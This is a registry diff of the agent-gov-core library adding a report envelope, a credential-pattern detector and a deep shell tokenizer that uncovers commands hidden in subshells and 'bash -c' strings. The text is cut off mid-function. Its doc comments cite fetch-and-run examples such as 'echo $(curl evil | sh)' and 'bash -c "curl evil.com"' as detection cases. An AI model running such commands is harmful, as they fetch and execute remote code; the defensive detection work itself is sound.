agent-gov-core 0.4.3 → 0.7.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/CHANGELOG.md +101 -0
- package/README.md +53 -5
- package/dist/action.d.ts +30 -0
- package/dist/action.js +98 -0
- package/dist/exceptions.d.ts +83 -0
- package/dist/exceptions.js +129 -0
- package/dist/finding.js +7 -4
- package/dist/index.d.ts +12 -2
- package/dist/index.js +7 -2
- package/dist/jsonc.js +2 -1
- package/dist/locators.d.ts +3 -1
- package/dist/locators.js +66 -34
- package/dist/mcp.js +61 -2
- package/dist/merge.d.ts +91 -0
- package/dist/merge.js +154 -0
- package/dist/parse-error.d.ts +54 -0
- package/dist/parse-error.js +85 -0
- package/dist/report.d.ts +85 -0
- package/dist/report.js +156 -0
- package/dist/secrets.d.ts +67 -0
- package/dist/secrets.js +81 -0
- package/dist/shell.d.ts +26 -0
- package/dist/shell.js +210 -1
- package/dist/toml.js +28 -7
- package/package.json +3 -2
- package/schemas/report.schema.json +55 -0
package/dist/report.d.ts
ADDED
|
@@ -0,0 +1,85 @@
|
|
|
1
|
+
import { type Finding, type Severity, type ToolKind } from './finding.js';
|
|
2
|
+
/** Canonical envelope version. */
|
|
3
|
+
export declare const REPORT_SCHEMA_VERSION: "1.0";
|
|
4
|
+
/**
|
|
5
|
+
* Canonical multi-tool report envelope. Wraps `Finding[]` with provenance,
|
|
6
|
+
* rating, and optional tool-specific extension data so a cross-tool
|
|
7
|
+
* meta-reviewer can ingest reports from N tools through one shape.
|
|
8
|
+
*/
|
|
9
|
+
export interface Report {
|
|
10
|
+
schemaVersion: typeof REPORT_SCHEMA_VERSION;
|
|
11
|
+
tool: ToolKind;
|
|
12
|
+
toolVersion?: string;
|
|
13
|
+
runId?: string;
|
|
14
|
+
/**
|
|
15
|
+
* Identifier for the agent session, PR review, or thread this run belongs to.
|
|
16
|
+
* Distinct from `runId` (which identifies *this* tool run): one conversation
|
|
17
|
+
* can produce many runs. Matches OpenTelemetry's `gen_ai.conversation.id`
|
|
18
|
+
* semantic convention — if a consumer also emits OTel traces about the same
|
|
19
|
+
* agent session, pass the same string here and downstream tooling can cross-
|
|
20
|
+
* reference governance findings with the traces.
|
|
21
|
+
*
|
|
22
|
+
* @see https://opentelemetry.io/docs/specs/semconv/gen-ai/
|
|
23
|
+
*/
|
|
24
|
+
conversationId?: string;
|
|
25
|
+
baseRef?: string;
|
|
26
|
+
headRef?: string;
|
|
27
|
+
/** Aggregate severity. `'none'` iff findings is empty or all below threshold. */
|
|
28
|
+
rating: 'none' | Severity;
|
|
29
|
+
findings: Finding[];
|
|
30
|
+
/** Tool-specific extension data (PolicyMesh `effectiveUnion`, CapabilityEcho `surfaceSummary`, etc). */
|
|
31
|
+
data?: Record<string, unknown>;
|
|
32
|
+
}
|
|
33
|
+
export interface CreateReportSpec {
|
|
34
|
+
tool: ToolKind;
|
|
35
|
+
toolVersion?: string;
|
|
36
|
+
runId?: string;
|
|
37
|
+
/** See {@link Report.conversationId}. */
|
|
38
|
+
conversationId?: string;
|
|
39
|
+
baseRef?: string;
|
|
40
|
+
headRef?: string;
|
|
41
|
+
findings: Finding[];
|
|
42
|
+
data?: Record<string, unknown>;
|
|
43
|
+
/**
|
|
44
|
+
* Explicit rating override. When omitted, `rating` is computed as the
|
|
45
|
+
* maximum severity across `findings` (or `'none'` if empty).
|
|
46
|
+
*/
|
|
47
|
+
rating?: 'none' | Severity;
|
|
48
|
+
}
|
|
49
|
+
/**
|
|
50
|
+
* Build a {@link Report} with `schemaVersion` set and `rating` derived from
|
|
51
|
+
* the maximum finding severity (unless overridden). This is the recommended
|
|
52
|
+
* way to produce a report — sets the envelope version correctly and computes
|
|
53
|
+
* the rating consistently with other tools.
|
|
54
|
+
*
|
|
55
|
+
* @example
|
|
56
|
+
* const report = createReport({
|
|
57
|
+
* tool: 'scope_trail',
|
|
58
|
+
* toolVersion: '0.1.18',
|
|
59
|
+
* baseRef: 'abc123',
|
|
60
|
+
* headRef: 'def456',
|
|
61
|
+
* findings: [finding1, finding2],
|
|
62
|
+
* data: { mcpServers: [...] },
|
|
63
|
+
* });
|
|
64
|
+
*/
|
|
65
|
+
export declare function createReport(spec: CreateReportSpec): Report;
|
|
66
|
+
/**
|
|
67
|
+
* Maximum severity across a finding list. Returns `'none'` for empty input.
|
|
68
|
+
* Used by {@link createReport} when no explicit rating is supplied.
|
|
69
|
+
*/
|
|
70
|
+
export declare function maxSeverity(findings: readonly Finding[]): 'none' | Severity;
|
|
71
|
+
export interface ReportValidationResult {
|
|
72
|
+
ok: boolean;
|
|
73
|
+
errors: string[];
|
|
74
|
+
}
|
|
75
|
+
/**
|
|
76
|
+
* Runtime check that a value conforms to the canonical Report envelope.
|
|
77
|
+
* Aggregates errors across all findings — a single malformed finding does
|
|
78
|
+
* not short-circuit the rest of the envelope check.
|
|
79
|
+
*
|
|
80
|
+
* @example
|
|
81
|
+
* const result = validateReport(JSON.parse(reportJson));
|
|
82
|
+
* if (!result.ok) console.error(result.errors.join('\n'));
|
|
83
|
+
*/
|
|
84
|
+
export declare function validateReport(value: unknown): ReportValidationResult;
|
|
85
|
+
//# sourceMappingURL=report.d.ts.map
|
package/dist/report.js
ADDED
|
@@ -0,0 +1,156 @@
|
|
|
1
|
+
import { SEVERITIES, TOOL_KINDS, isSeverity, isToolKind, validateFinding, } from './finding.js';
|
|
2
|
+
/** Canonical envelope version. */
|
|
3
|
+
export const REPORT_SCHEMA_VERSION = '1.0';
|
|
4
|
+
/**
|
|
5
|
+
* Build a {@link Report} with `schemaVersion` set and `rating` derived from
|
|
6
|
+
* the maximum finding severity (unless overridden). This is the recommended
|
|
7
|
+
* way to produce a report — sets the envelope version correctly and computes
|
|
8
|
+
* the rating consistently with other tools.
|
|
9
|
+
*
|
|
10
|
+
* @example
|
|
11
|
+
* const report = createReport({
|
|
12
|
+
* tool: 'scope_trail',
|
|
13
|
+
* toolVersion: '0.1.18',
|
|
14
|
+
* baseRef: 'abc123',
|
|
15
|
+
* headRef: 'def456',
|
|
16
|
+
* findings: [finding1, finding2],
|
|
17
|
+
* data: { mcpServers: [...] },
|
|
18
|
+
* });
|
|
19
|
+
*/
|
|
20
|
+
export function createReport(spec) {
|
|
21
|
+
const report = {
|
|
22
|
+
schemaVersion: REPORT_SCHEMA_VERSION,
|
|
23
|
+
tool: spec.tool,
|
|
24
|
+
rating: spec.rating ?? maxSeverity(spec.findings),
|
|
25
|
+
findings: spec.findings,
|
|
26
|
+
};
|
|
27
|
+
if (spec.toolVersion !== undefined)
|
|
28
|
+
report.toolVersion = spec.toolVersion;
|
|
29
|
+
if (spec.runId !== undefined)
|
|
30
|
+
report.runId = spec.runId;
|
|
31
|
+
if (spec.conversationId !== undefined)
|
|
32
|
+
report.conversationId = spec.conversationId;
|
|
33
|
+
if (spec.baseRef !== undefined)
|
|
34
|
+
report.baseRef = spec.baseRef;
|
|
35
|
+
if (spec.headRef !== undefined)
|
|
36
|
+
report.headRef = spec.headRef;
|
|
37
|
+
if (spec.data !== undefined)
|
|
38
|
+
report.data = spec.data;
|
|
39
|
+
return report;
|
|
40
|
+
}
|
|
41
|
+
/**
|
|
42
|
+
* Maximum severity across a finding list. Returns `'none'` for empty input.
|
|
43
|
+
* Used by {@link createReport} when no explicit rating is supplied.
|
|
44
|
+
*/
|
|
45
|
+
export function maxSeverity(findings) {
|
|
46
|
+
let best = 'none';
|
|
47
|
+
for (const f of findings) {
|
|
48
|
+
if (severityRank(f.severity) > severityRank(best))
|
|
49
|
+
best = f.severity;
|
|
50
|
+
}
|
|
51
|
+
return best;
|
|
52
|
+
}
|
|
53
|
+
function severityRank(s) {
|
|
54
|
+
if (s === 'none')
|
|
55
|
+
return 0;
|
|
56
|
+
if (s === 'low')
|
|
57
|
+
return 1;
|
|
58
|
+
if (s === 'medium')
|
|
59
|
+
return 2;
|
|
60
|
+
if (s === 'high')
|
|
61
|
+
return 3;
|
|
62
|
+
return 4;
|
|
63
|
+
}
|
|
64
|
+
const REPORT_ALLOWED_KEYS = new Set([
|
|
65
|
+
'schemaVersion',
|
|
66
|
+
'tool',
|
|
67
|
+
'toolVersion',
|
|
68
|
+
'runId',
|
|
69
|
+
'conversationId',
|
|
70
|
+
'baseRef',
|
|
71
|
+
'headRef',
|
|
72
|
+
'rating',
|
|
73
|
+
'findings',
|
|
74
|
+
'data',
|
|
75
|
+
]);
|
|
76
|
+
const RATING_VALUES = new Set(['none', ...SEVERITIES]);
|
|
77
|
+
/**
|
|
78
|
+
* Runtime check that a value conforms to the canonical Report envelope.
|
|
79
|
+
* Aggregates errors across all findings — a single malformed finding does
|
|
80
|
+
* not short-circuit the rest of the envelope check.
|
|
81
|
+
*
|
|
82
|
+
* @example
|
|
83
|
+
* const result = validateReport(JSON.parse(reportJson));
|
|
84
|
+
* if (!result.ok) console.error(result.errors.join('\n'));
|
|
85
|
+
*/
|
|
86
|
+
export function validateReport(value) {
|
|
87
|
+
const errors = [];
|
|
88
|
+
if (value === null || typeof value !== 'object' || Array.isArray(value)) {
|
|
89
|
+
return { ok: false, errors: ['report must be a plain object'] };
|
|
90
|
+
}
|
|
91
|
+
const v = value;
|
|
92
|
+
if (v.schemaVersion !== REPORT_SCHEMA_VERSION) {
|
|
93
|
+
errors.push(`schemaVersion must be '${REPORT_SCHEMA_VERSION}'`);
|
|
94
|
+
}
|
|
95
|
+
if (!isToolKind(v.tool)) {
|
|
96
|
+
errors.push(`tool must be one of: ${TOOL_KINDS.join(', ')}`);
|
|
97
|
+
}
|
|
98
|
+
if (typeof v.rating !== 'string' || !RATING_VALUES.has(v.rating)) {
|
|
99
|
+
errors.push(`rating must be one of: none, ${SEVERITIES.join(', ')}`);
|
|
100
|
+
}
|
|
101
|
+
if (!Array.isArray(v.findings)) {
|
|
102
|
+
errors.push('findings must be an array');
|
|
103
|
+
}
|
|
104
|
+
else {
|
|
105
|
+
for (let i = 0; i < v.findings.length; i++) {
|
|
106
|
+
const f = validateFinding(v.findings[i]);
|
|
107
|
+
if (!f.ok) {
|
|
108
|
+
errors.push(`findings[${i}]: ${f.errors.join('; ')}`);
|
|
109
|
+
}
|
|
110
|
+
else if (isToolKind(v.tool) && v.findings[i].tool !== v.tool) {
|
|
111
|
+
errors.push(`findings[${i}].tool ('${v.findings[i].tool}') does not match report.tool ('${v.tool}')`);
|
|
112
|
+
}
|
|
113
|
+
}
|
|
114
|
+
}
|
|
115
|
+
if (v.toolVersion !== undefined && typeof v.toolVersion !== 'string') {
|
|
116
|
+
errors.push('toolVersion must be a string when present');
|
|
117
|
+
}
|
|
118
|
+
if (v.runId !== undefined && typeof v.runId !== 'string') {
|
|
119
|
+
errors.push('runId must be a string when present');
|
|
120
|
+
}
|
|
121
|
+
if (v.conversationId !== undefined && typeof v.conversationId !== 'string') {
|
|
122
|
+
errors.push('conversationId must be a string when present');
|
|
123
|
+
}
|
|
124
|
+
if (v.baseRef !== undefined && typeof v.baseRef !== 'string') {
|
|
125
|
+
errors.push('baseRef must be a string when present');
|
|
126
|
+
}
|
|
127
|
+
if (v.headRef !== undefined && typeof v.headRef !== 'string') {
|
|
128
|
+
errors.push('headRef must be a string when present');
|
|
129
|
+
}
|
|
130
|
+
if (v.data !== undefined && (v.data === null || typeof v.data !== 'object' || Array.isArray(v.data))) {
|
|
131
|
+
errors.push('data must be an object when present');
|
|
132
|
+
}
|
|
133
|
+
for (const key of Object.keys(v)) {
|
|
134
|
+
if (!REPORT_ALLOWED_KEYS.has(key))
|
|
135
|
+
errors.push(`unknown property: ${key}`);
|
|
136
|
+
}
|
|
137
|
+
// Cross-field consistency: rating should be at or above the max finding severity.
|
|
138
|
+
// We don't *enforce* this strictly (a tool may downgrade by policy) but flag a
|
|
139
|
+
// genuine inconsistency where the rating is BELOW what the findings imply.
|
|
140
|
+
if (Array.isArray(v.findings) &&
|
|
141
|
+
typeof v.rating === 'string' &&
|
|
142
|
+
RATING_VALUES.has(v.rating)) {
|
|
143
|
+
const findingsOk = v.findings.every((f) => validateFinding(f).ok);
|
|
144
|
+
if (findingsOk) {
|
|
145
|
+
const implied = maxSeverity(v.findings);
|
|
146
|
+
if (severityRank(v.rating) < severityRank(implied)) {
|
|
147
|
+
errors.push(`rating '${v.rating}' is below the maximum finding severity '${implied}'`);
|
|
148
|
+
}
|
|
149
|
+
}
|
|
150
|
+
}
|
|
151
|
+
// Ensure isSeverity-style check on rating when not 'none' for callers that
|
|
152
|
+
// need a tighter type than the wider RATING_VALUES set.
|
|
153
|
+
void isSeverity;
|
|
154
|
+
return { ok: errors.length === 0, errors };
|
|
155
|
+
}
|
|
156
|
+
//# sourceMappingURL=report.js.map
|
|
@@ -0,0 +1,67 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* Hardcoded credential detection.
|
|
3
|
+
*
|
|
4
|
+
* Scans strings for provider-prefix tokens (Anthropic, OpenAI, GitHub, AWS,
|
|
5
|
+
* Slack, Google, GitLab, npm, Docker, Stripe) plus a length-restricted hex
|
|
6
|
+
* pattern that only fires in env/header context (a bare hex blob in a
|
|
7
|
+
* positional command argument is indistinguishable from a commit SHA).
|
|
8
|
+
*
|
|
9
|
+
* Contract: the literal credential is NEVER returned in any field. Callers
|
|
10
|
+
* receive only the provider name plus the pattern that matched (provider
|
|
11
|
+
* label only — not the regex). This is the same contract PolicyMesh shipped
|
|
12
|
+
* the detector under, lifted into the substrate so every governance tool
|
|
13
|
+
* uses one source of truth for "what does a hardcoded credential look like."
|
|
14
|
+
*
|
|
15
|
+
* @example
|
|
16
|
+
* import { matchSecret } from 'agent-gov-core';
|
|
17
|
+
*
|
|
18
|
+
* matchSecret('sk-ant-abcdefghijklmnopqrstuv');
|
|
19
|
+
* // → { provider: 'Anthropic' }
|
|
20
|
+
*
|
|
21
|
+
* matchSecret('env:OPENAI_API_KEY');
|
|
22
|
+
* // → undefined (env var reference, not a literal)
|
|
23
|
+
*
|
|
24
|
+
* matchSecret('a'.repeat(40), { envOrHeaderContext: true });
|
|
25
|
+
* // → undefined (only A-F0-9 are hex; not a hex token)
|
|
26
|
+
*/
|
|
27
|
+
export interface SecretMatch {
|
|
28
|
+
/** Human-readable provider name. The literal credential is NEVER included. */
|
|
29
|
+
provider: string;
|
|
30
|
+
}
|
|
31
|
+
export interface MatchSecretOptions {
|
|
32
|
+
/**
|
|
33
|
+
* When `true`, patterns flagged `envOrHeaderOnly` are eligible. Set this
|
|
34
|
+
* only when scanning env values or HTTP header values — never when scanning
|
|
35
|
+
* a joined launch command (positional args often contain commit SHAs that
|
|
36
|
+
* would false-positive against a bare hex token pattern).
|
|
37
|
+
*/
|
|
38
|
+
envOrHeaderContext?: boolean;
|
|
39
|
+
}
|
|
40
|
+
interface SecretPattern {
|
|
41
|
+
provider: string;
|
|
42
|
+
regex: RegExp;
|
|
43
|
+
/** See {@link MatchSecretOptions.envOrHeaderContext}. */
|
|
44
|
+
envOrHeaderOnly?: boolean;
|
|
45
|
+
}
|
|
46
|
+
/**
|
|
47
|
+
* Built-in provider patterns. Conservative — only shapes whose prefix
|
|
48
|
+
* unambiguously identifies a credential class. The bare hex pattern is gated
|
|
49
|
+
* to env/header context to avoid commit-SHA false positives.
|
|
50
|
+
*
|
|
51
|
+
* Stable as of v0.7.0 — additions are non-breaking, removals or shape changes
|
|
52
|
+
* require a major bump (the golden compatibility tests in `test/golden.test.mjs`
|
|
53
|
+
* pin the current provider set).
|
|
54
|
+
*/
|
|
55
|
+
export declare const SECRET_PATTERNS: readonly Readonly<SecretPattern>[];
|
|
56
|
+
/**
|
|
57
|
+
* Scan `value` for a hardcoded provider credential. Returns the matched
|
|
58
|
+
* provider name (never the literal credential) or `undefined` when nothing
|
|
59
|
+
* matches.
|
|
60
|
+
*
|
|
61
|
+
* Set `options.envOrHeaderContext` to `true` only when scanning env values
|
|
62
|
+
* or HTTP header values — that enables the more permissive hex-token pattern
|
|
63
|
+
* which would false-positive on positional command arguments.
|
|
64
|
+
*/
|
|
65
|
+
export declare function matchSecret(value: string, options?: MatchSecretOptions): SecretMatch | undefined;
|
|
66
|
+
export {};
|
|
67
|
+
//# sourceMappingURL=secrets.d.ts.map
|
package/dist/secrets.js
ADDED
|
@@ -0,0 +1,81 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* Hardcoded credential detection.
|
|
3
|
+
*
|
|
4
|
+
* Scans strings for provider-prefix tokens (Anthropic, OpenAI, GitHub, AWS,
|
|
5
|
+
* Slack, Google, GitLab, npm, Docker, Stripe) plus a length-restricted hex
|
|
6
|
+
* pattern that only fires in env/header context (a bare hex blob in a
|
|
7
|
+
* positional command argument is indistinguishable from a commit SHA).
|
|
8
|
+
*
|
|
9
|
+
* Contract: the literal credential is NEVER returned in any field. Callers
|
|
10
|
+
* receive only the provider name plus the pattern that matched (provider
|
|
11
|
+
* label only — not the regex). This is the same contract PolicyMesh shipped
|
|
12
|
+
* the detector under, lifted into the substrate so every governance tool
|
|
13
|
+
* uses one source of truth for "what does a hardcoded credential look like."
|
|
14
|
+
*
|
|
15
|
+
* @example
|
|
16
|
+
* import { matchSecret } from 'agent-gov-core';
|
|
17
|
+
*
|
|
18
|
+
* matchSecret('sk-ant-abcdefghijklmnopqrstuv');
|
|
19
|
+
* // → { provider: 'Anthropic' }
|
|
20
|
+
*
|
|
21
|
+
* matchSecret('env:OPENAI_API_KEY');
|
|
22
|
+
* // → undefined (env var reference, not a literal)
|
|
23
|
+
*
|
|
24
|
+
* matchSecret('a'.repeat(40), { envOrHeaderContext: true });
|
|
25
|
+
* // → undefined (only A-F0-9 are hex; not a hex token)
|
|
26
|
+
*/
|
|
27
|
+
/**
|
|
28
|
+
* Built-in provider patterns. Conservative — only shapes whose prefix
|
|
29
|
+
* unambiguously identifies a credential class. The bare hex pattern is gated
|
|
30
|
+
* to env/header context to avoid commit-SHA false positives.
|
|
31
|
+
*
|
|
32
|
+
* Stable as of v0.7.0 — additions are non-breaking, removals or shape changes
|
|
33
|
+
* require a major bump (the golden compatibility tests in `test/golden.test.mjs`
|
|
34
|
+
* pin the current provider set).
|
|
35
|
+
*/
|
|
36
|
+
export const SECRET_PATTERNS = [
|
|
37
|
+
{ provider: 'Anthropic', regex: /sk-ant-[A-Za-z0-9_-]{20,}/ },
|
|
38
|
+
{ provider: 'OpenAI', regex: /sk-proj-[A-Za-z0-9_-]{20,}/ },
|
|
39
|
+
{ provider: 'OpenAI', regex: /sk-(?!ant-|proj-)[A-Za-z0-9]{32,}/ },
|
|
40
|
+
{ provider: 'GitHub', regex: /gh[pousr]_[A-Za-z0-9]{36,}/ },
|
|
41
|
+
{ provider: 'GitHub', regex: /github_pat_[A-Za-z0-9_]{20,}/ },
|
|
42
|
+
{ provider: 'Slack', regex: /xox[abprs]-[A-Za-z0-9-]{20,}/ },
|
|
43
|
+
{ provider: 'AWS', regex: /AKIA[0-9A-Z]{16}/ },
|
|
44
|
+
{ provider: 'Google', regex: /AIza[0-9A-Za-z_-]{35}/ },
|
|
45
|
+
{ provider: 'GitLab', regex: /glpat-[A-Za-z0-9_-]{20,}/ },
|
|
46
|
+
{ provider: 'npm', regex: /npm_[A-Za-z0-9]{36}/ },
|
|
47
|
+
{ provider: 'Docker', regex: /dckr_pat_[A-Za-z0-9_-]{20,}/ },
|
|
48
|
+
{ provider: 'Stripe', regex: /(?:sk|rk)_(?:live|test)_[A-Za-z0-9]{20,}/ },
|
|
49
|
+
// env/header context only — see comment block at top of file.
|
|
50
|
+
{ provider: 'Hex token', regex: /(?:^|[^A-Fa-f0-9])([A-Fa-f0-9]{40,})(?:$|[^A-Fa-f0-9])/, envOrHeaderOnly: true },
|
|
51
|
+
];
|
|
52
|
+
/**
|
|
53
|
+
* Prefix marking an environment-variable reference. Values starting with
|
|
54
|
+
* `env:` are not literal credentials — they're a reference resolved at
|
|
55
|
+
* runtime by the consuming tool (Codex notation). Skipped during scanning.
|
|
56
|
+
*/
|
|
57
|
+
const ENV_REFERENCE_PREFIX = 'env:';
|
|
58
|
+
/**
|
|
59
|
+
* Scan `value` for a hardcoded provider credential. Returns the matched
|
|
60
|
+
* provider name (never the literal credential) or `undefined` when nothing
|
|
61
|
+
* matches.
|
|
62
|
+
*
|
|
63
|
+
* Set `options.envOrHeaderContext` to `true` only when scanning env values
|
|
64
|
+
* or HTTP header values — that enables the more permissive hex-token pattern
|
|
65
|
+
* which would false-positive on positional command arguments.
|
|
66
|
+
*/
|
|
67
|
+
export function matchSecret(value, options = {}) {
|
|
68
|
+
if (!value)
|
|
69
|
+
return undefined;
|
|
70
|
+
if (value.startsWith(ENV_REFERENCE_PREFIX))
|
|
71
|
+
return undefined;
|
|
72
|
+
for (const pattern of SECRET_PATTERNS) {
|
|
73
|
+
if (pattern.envOrHeaderOnly && !options.envOrHeaderContext)
|
|
74
|
+
continue;
|
|
75
|
+
if (pattern.regex.test(value)) {
|
|
76
|
+
return { provider: pattern.provider };
|
|
77
|
+
}
|
|
78
|
+
}
|
|
79
|
+
return undefined;
|
|
80
|
+
}
|
|
81
|
+
//# sourceMappingURL=secrets.js.map
|
package/dist/shell.d.ts
CHANGED
|
@@ -12,6 +12,32 @@
|
|
|
12
12
|
* // → ['echo "; not a separator"']
|
|
13
13
|
*/
|
|
14
14
|
export declare function tokenizeShell(command: string): string[];
|
|
15
|
+
/**
|
|
16
|
+
* Like {@link tokenizeShell}, but recursively extracts commands nested inside
|
|
17
|
+
* shell evaluation contexts that the top-level tokenizer would leave as opaque
|
|
18
|
+
* text:
|
|
19
|
+
*
|
|
20
|
+
* - Subshell `$(...)`
|
|
21
|
+
* - Backtick `` `...` ``
|
|
22
|
+
* - `bash -c "..."`, `sh -c "..."`, `zsh -c "..."`, `python -c "..."` payloads
|
|
23
|
+
*
|
|
24
|
+
* The flat result is suitable for feeding straight to {@link getCommandHead},
|
|
25
|
+
* letting downstream detectors see commands an agent might try to hide behind
|
|
26
|
+
* `echo $(curl evil | sh)` or `bash -c "curl evil"`.
|
|
27
|
+
*
|
|
28
|
+
* Conservative implementation — handles the common obfuscation shapes, not a
|
|
29
|
+
* full shell parser. Variable expansion, process substitution `<(…)`, and
|
|
30
|
+
* arithmetic `$((…))` are not recursed into. Comma-quoting (`bash -c $'…'`) is
|
|
31
|
+
* not unquoted.
|
|
32
|
+
*
|
|
33
|
+
* @example
|
|
34
|
+
* tokenizeShellDeep('echo $(curl -fsSL m.sh | sh)');
|
|
35
|
+
* // → ['echo', 'curl -fsSL m.sh', 'sh']
|
|
36
|
+
*
|
|
37
|
+
* tokenizeShellDeep('bash -c "curl evil.com"');
|
|
38
|
+
* // → ['bash -c "curl evil.com"', 'curl evil.com']
|
|
39
|
+
*/
|
|
40
|
+
export declare function tokenizeShellDeep(command: string): string[];
|
|
15
41
|
/**
|
|
16
42
|
* Returns the resolved command verb for a subcommand string. Strips wrapping
|
|
17
43
|
* quotes, escape backslashes, and the inert-double-quote obfuscation
|
package/dist/shell.js
CHANGED
|
@@ -83,8 +83,17 @@ export function tokenizeShell(command) {
|
|
|
83
83
|
i += 2;
|
|
84
84
|
continue;
|
|
85
85
|
}
|
|
86
|
-
// Treat a single `&` (background) as a separator too
|
|
86
|
+
// Treat a single `&` (background) as a separator too — UNLESS preceded
|
|
87
|
+
// by `>` or `<`, in which case it's a file-descriptor redirection like
|
|
88
|
+
// `2>&1`, `>&2`, or `<&3`. Splitting there would break shell-command
|
|
89
|
+
// detection on every command that redirects stderr to stdout.
|
|
87
90
|
if (c === '&') {
|
|
91
|
+
const prev = buf.trimEnd().slice(-1);
|
|
92
|
+
if (prev === '>' || prev === '<') {
|
|
93
|
+
buf += c;
|
|
94
|
+
i++;
|
|
95
|
+
continue;
|
|
96
|
+
}
|
|
88
97
|
pushPart(out, buf);
|
|
89
98
|
buf = '';
|
|
90
99
|
i++;
|
|
@@ -101,6 +110,206 @@ function pushPart(out, part) {
|
|
|
101
110
|
if (trimmed !== '')
|
|
102
111
|
out.push(trimmed);
|
|
103
112
|
}
|
|
113
|
+
/**
|
|
114
|
+
* Like {@link tokenizeShell}, but recursively extracts commands nested inside
|
|
115
|
+
* shell evaluation contexts that the top-level tokenizer would leave as opaque
|
|
116
|
+
* text:
|
|
117
|
+
*
|
|
118
|
+
* - Subshell `$(...)`
|
|
119
|
+
* - Backtick `` `...` ``
|
|
120
|
+
* - `bash -c "..."`, `sh -c "..."`, `zsh -c "..."`, `python -c "..."` payloads
|
|
121
|
+
*
|
|
122
|
+
* The flat result is suitable for feeding straight to {@link getCommandHead},
|
|
123
|
+
* letting downstream detectors see commands an agent might try to hide behind
|
|
124
|
+
* `echo $(curl evil | sh)` or `bash -c "curl evil"`.
|
|
125
|
+
*
|
|
126
|
+
* Conservative implementation — handles the common obfuscation shapes, not a
|
|
127
|
+
* full shell parser. Variable expansion, process substitution `<(…)`, and
|
|
128
|
+
* arithmetic `$((…))` are not recursed into. Comma-quoting (`bash -c $'…'`) is
|
|
129
|
+
* not unquoted.
|
|
130
|
+
*
|
|
131
|
+
* @example
|
|
132
|
+
* tokenizeShellDeep('echo $(curl -fsSL m.sh | sh)');
|
|
133
|
+
* // → ['echo', 'curl -fsSL m.sh', 'sh']
|
|
134
|
+
*
|
|
135
|
+
* tokenizeShellDeep('bash -c "curl evil.com"');
|
|
136
|
+
* // → ['bash -c "curl evil.com"', 'curl evil.com']
|
|
137
|
+
*/
|
|
138
|
+
export function tokenizeShellDeep(command) {
|
|
139
|
+
const out = [];
|
|
140
|
+
const seen = new Set();
|
|
141
|
+
const visit = (cmd, depth) => {
|
|
142
|
+
if (depth > 8)
|
|
143
|
+
return; // guard against pathological nesting
|
|
144
|
+
// Extract nested payloads from the WHOLE command first — `tokenizeShell`
|
|
145
|
+
// splits on `|` regardless of paren depth, so `$(curl m.sh | sh)` would
|
|
146
|
+
// already be cut in two by the time we tried to walk it for `$(…)`.
|
|
147
|
+
const nested = extractNestedShellPayloads(cmd);
|
|
148
|
+
for (const sub of tokenizeShell(cmd)) {
|
|
149
|
+
if (!seen.has(sub)) {
|
|
150
|
+
seen.add(sub);
|
|
151
|
+
out.push(sub);
|
|
152
|
+
}
|
|
153
|
+
}
|
|
154
|
+
for (const n of nested) {
|
|
155
|
+
visit(n, depth + 1);
|
|
156
|
+
}
|
|
157
|
+
};
|
|
158
|
+
visit(command, 0);
|
|
159
|
+
return out;
|
|
160
|
+
}
|
|
161
|
+
/**
|
|
162
|
+
* Return all shell-evaluation payloads embedded in a single subcommand:
|
|
163
|
+
* - `$(…)` and `` `…` `` bodies (paren/backtick balanced)
|
|
164
|
+
* - `(bash|sh|zsh|python|python3|perl|ruby|node) -c <quoted-string>` payloads
|
|
165
|
+
* The payloads are returned UNQUOTED but otherwise raw.
|
|
166
|
+
*/
|
|
167
|
+
function extractNestedShellPayloads(subcommand) {
|
|
168
|
+
const found = [];
|
|
169
|
+
const len = subcommand.length;
|
|
170
|
+
let i = 0;
|
|
171
|
+
let inSingle = false;
|
|
172
|
+
let inDouble = false;
|
|
173
|
+
// Pre-compiled here so we can use it inside the quote-aware walk.
|
|
174
|
+
const dashCMatcher = /^(?:bash|sh|zsh|ksh|dash|ash|fish|python3?|perl|ruby|node)\s+-c\s+/;
|
|
175
|
+
while (i < len) {
|
|
176
|
+
const c = subcommand[i];
|
|
177
|
+
// Plain single quotes: nothing inside is shell-interpreted
|
|
178
|
+
if (inSingle) {
|
|
179
|
+
if (c === "'")
|
|
180
|
+
inSingle = false;
|
|
181
|
+
i++;
|
|
182
|
+
continue;
|
|
183
|
+
}
|
|
184
|
+
if (c === "'") {
|
|
185
|
+
inSingle = true;
|
|
186
|
+
i++;
|
|
187
|
+
continue;
|
|
188
|
+
}
|
|
189
|
+
// Inside double quotes, `$(…)` and backticks STILL evaluate, so we
|
|
190
|
+
// keep scanning. Just remember to re-enable detection of an outer
|
|
191
|
+
// closing `"`.
|
|
192
|
+
if (c === '"') {
|
|
193
|
+
inDouble = !inDouble;
|
|
194
|
+
i++;
|
|
195
|
+
continue;
|
|
196
|
+
}
|
|
197
|
+
// $(...)
|
|
198
|
+
if (c === '$' && subcommand[i + 1] === '(') {
|
|
199
|
+
const body = readBalanced(subcommand, i + 2, '(', ')');
|
|
200
|
+
if (body !== null) {
|
|
201
|
+
found.push(body.content);
|
|
202
|
+
i = body.endIndex;
|
|
203
|
+
continue;
|
|
204
|
+
}
|
|
205
|
+
}
|
|
206
|
+
// Backticks
|
|
207
|
+
if (c === '`') {
|
|
208
|
+
const close = subcommand.indexOf('`', i + 1);
|
|
209
|
+
if (close !== -1) {
|
|
210
|
+
found.push(subcommand.slice(i + 1, close));
|
|
211
|
+
i = close + 1;
|
|
212
|
+
continue;
|
|
213
|
+
}
|
|
214
|
+
}
|
|
215
|
+
// `bash -c "..."` and friends — checked only OUTSIDE quoted regions so
|
|
216
|
+
// `echo "bash -c \"curl evil\""` (data, not a command) doesn't trigger.
|
|
217
|
+
// Match boundary: only at start-of-string OR after whitespace / a chain
|
|
218
|
+
// separator.
|
|
219
|
+
if (!inDouble) {
|
|
220
|
+
const atBoundary = i === 0 || /[\s;|&]/.test(subcommand[i - 1]);
|
|
221
|
+
if (atBoundary) {
|
|
222
|
+
const tail = subcommand.slice(i);
|
|
223
|
+
const dashCMatch = dashCMatcher.exec(tail);
|
|
224
|
+
if (dashCMatch) {
|
|
225
|
+
const afterFlag = i + dashCMatch[0].length;
|
|
226
|
+
const payload = readQuotedArg(subcommand, afterFlag);
|
|
227
|
+
if (payload !== null)
|
|
228
|
+
found.push(payload);
|
|
229
|
+
// Skip past the matched `bash -c ` prefix so the walk continues
|
|
230
|
+
// from the argument position; we don't try to compute where the
|
|
231
|
+
